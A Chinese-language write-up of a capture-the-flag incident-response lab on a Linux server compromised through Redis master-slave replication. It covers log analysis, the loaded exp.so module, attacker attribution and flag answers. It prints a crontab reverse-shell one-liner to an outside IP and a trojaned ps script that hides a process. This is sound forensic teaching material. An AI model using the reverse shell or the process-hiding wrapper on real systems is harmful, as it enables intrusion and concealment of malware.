第二章 日志分析-redis应急响应

文章发布时间:

最后更新时间:

文章总字数:
1.8k

预计阅读时间:
9 分钟

页面浏览: 加载中...

简介:

服务器场景操作系统 Linux
服务器账号密码 root xjredis

任务环境说明
注:样本请勿在本地运行!!!样本请勿在本地运行!!!样本请勿在本地运行!!!
应急响应工程师小王某人收到安全设备告警服务器被植入恶意文件,请上机排查

1.

通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交

先通过 redis.conf 看一下日志文件在哪里,在 /var/log/redis.log 目录

image

image

分析下面这段,开始一直尝试切换主节点到 192.168.100.13:8888,但是失败,然后从节点被强制切换为不同的主节点(192.168.31.55 和 192.168.100.20),最后 Redis 从恶意主节点同步后,加载了一个名为 exp.so 的模块,故黑客进行了 redis主从复制RCE 的攻击,黑客IP为192.168.100.20,flag{192.168.100.20}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
                _._                                                
           _.-``__ ''-._                                           
      _.-``    `.  `_.  ''-._           Redis 5.0.1 (00000000/0) 64 bit
  .-`` .-‍```.  ‍```\/    _.,_ ''-._                                 
 (    '      ,       .-`  | `,    )     Running in standalone mode
 |`-._`-...-` __...-.``-._|'` _.-'|     Port: 6379
 |    `-._   `._    /     _.-'    |     PID: 419
  `-._    `-._  `-./  _.-'    _.-'                                 
 |`-._`-._    `-.__.-'    _.-'_.-'|                                
 |    `-._`-._        _.-'_.-'    |           http://redis.io      
  `-._    `-._`-.__.-'_.-'    _.-'                                 
 |`-._`-._    `-.__.-'    _.-'_.-'|                                
 |    `-._`-._        _.-'_.-'    |                                
  `-._    `-._`-.__.-'_.-'    _.-'                                 
      `-._    `-.__.-'    _.-'                                     
          `-._        _.-'                                         
              `-.__.-'                                             

419:M 31 Jul 2023 05:25:31.525 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128.
419:M 31 Jul 2023 05:25:31.525 # Server initialized
419:M 31 Jul 2023 05:25:31.525 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect.
419:M 31 Jul 2023 05:25:31.525 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled.
419:M 31 Jul 2023 05:25:31.525 * Ready to accept connections
419:S 31 Jul 2023 05:33:15.065 * Before turning into a replica, using my master parameters to synthesize a cached master: I may be able to synchronize with the new master with just a partial transfer.
419:S 31 Jul 2023 05:33:15.065 * REPLICAOF 192.168.100.13:8888 enabled (user request from 'id=3 addr=192.168.200.2:64289 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:S 31 Jul 2023 05:33:15.610 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:15.610 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:33:15.611 # Error condition on socket for SYNC: Connection refused
419:S 31 Jul 2023 05:33:16.612 * Connecting to MASTER 192.168.100.13:8888
419:S 31 Jul 2023 05:33:16.612 * MASTER <-> REPLICA sync started
...
419:S 31 Jul 2023 05:34:03.722 * Connecting to MASTER 192.168.31.55:8888
419:S 31 Jul 2023 05:34:03.722 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:33.786 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:33.786 * MASTER <-> REPLICA sync started
...
419:S 31 Jul 2023 05:34:35.791 * Connecting to MASTER 192.168.100.20:8888
419:S 31 Jul 2023 05:34:35.791 * MASTER <-> REPLICA sync started
419:S 31 Jul 2023 05:34:35.792 * Non blocking connect for SYNC fired the event.
419:S 31 Jul 2023 05:34:37.205 * Module 'system' loaded from ./exp.so
419:M 31 Jul 2023 05:34:37.210 # Setting secondary replication ID to 7a73a1a4297a16c50d8465b0cc432444f0e5df71, valid up to offset: 1. New replication ID is 46e68f9593cd148bffe464f0b04bee19ac447c39
419:M 31 Jul 2023 05:34:37.210 * MASTER MODE enabled (user request from 'id=6 addr=192.168.200.2:64339 fd=7 name= age=4 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=34 qbuf-free=32734 obl=0 oll=0 omem=0 events=r cmd=slaveof')
419:M 31 Jul 2023 05:34:37.231 * Module system unloaded
419:M 31 Jul 2023 05:42:00.685 * DB saved on disk
419:M 31 Jul 2023 05:42:42.213 * DB saved on disk
419:M 31 Jul 2023 06:06:44.597 # User requested shutdown...
419:M 31 Jul 2023 06:06:44.597 * Saving the final RDB snapshot before exiting.
419:M 31 Jul 2023 06:06:44.599 * DB saved on disk
419:M 31 Jul 2023 06:06:44.599 * Removing the pid file.
419:M 31 Jul 2023 06:06:44.599 # Redis is now ready to exit, bye bye...
441:C 31 Jul 2023 06:10:29.635 # oO0OoO0OoO0Oo Redis is starting oO0OoO0OoO0Oo
441:C 31 Jul 2023 06:10:29.640 # Redis version=5.0.1, bits=64, commit=00000000, modified=0, pid=441, just started
441:C 31 Jul 2023 06:10:29.640 # Configuration loaded
441:M 31 Jul 2023 06:10:29.643 * Increased maximum number of open files to 10032 (it was originally set to 1024).

2.

通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交

由第一题分析可知恶意文件为 /exp.so ,直接strings /exp.so |grep "flag"查看里面的flag即可,flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}

image

3.

通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交

将 /exp.so 下载到本地,放到微步云沙箱和安恒云沙箱都没有检测出网络行为,只好逆向分析。原来是调用该so文件,输入ip和port打redis的计划任务反弹shell

image

所以crontab -l看下计划任务能看到反弹shell的操作 */1 * * * * /bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&1,故flag{192.168.100.13}

image

这里看了巨魔师傅的WP,发现个自动化扫描linux操作系统的可提权项的脚本linpeas.sh,也能扫出这个计划任务

image

4.

通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交

留下用户信息的,首先想到ssh公钥文件,检查一下果然发现用户信息:xj-test-user

image

在github搜索到该用户,并且仓库中有redis主从复制利用的工具 redis-rogue-getshell ,在该仓库的历史提交记录中找到名为 tye 的记录,其中发现关键字符串,所以 flag{xj-test-user-wow-you-find-flag}

image

imageimage

5.

通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交

查看 PATH 变量,排查索引的所有目录

image

在 /usr/bin 目录下发现 ps 仅为178 byte 大小,明显被篡改,查看该文件发现黑客篡改的命令会隐藏 threadd 进程,特征字符串在文件末尾,flag{c195i2923381905517d818e313792d196}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root@ip-10-0-10-4:~# ls -l /usr/bin
...
-rwxrwxrwx 1 root root         178 Jul 31  2023  ps
-rwxr-xr-x 1 root root      133432 Jul 31  2023  ps_
lrwxrwxrwx 1 root root           9 Jul 28  2018  psfaddtable -> psfxtable
lrwxrwxrwx 1 root root           9 Jul 28  2018  psfgettable -> psfxtable
lrwxrwxrwx 1 root root           9 Jul 28  2018  psfstriptable -> psfxtable
-rwxr-xr-x 1 root root       22848 Jul 28  2018  psfxtable
-rwxr-xr-x 1 root root        3549 Jul 21  2020  ptar
-rwxr-xr-x 1 root root        2628 Jul 21  2020  ptardiff
...
root@ip-10-0-10-4:~# cat /usr/bin/ps
#/bin/bash
oldifs="$IFS"
IFS='\$n'
result=$(ps_ $1 $2 $3|grep -v 'threadd' )
for v in $result;
do
        echo -e "$v\t";
done
IFS="$oldifs"
#//c195i2923381905517d818e313792d196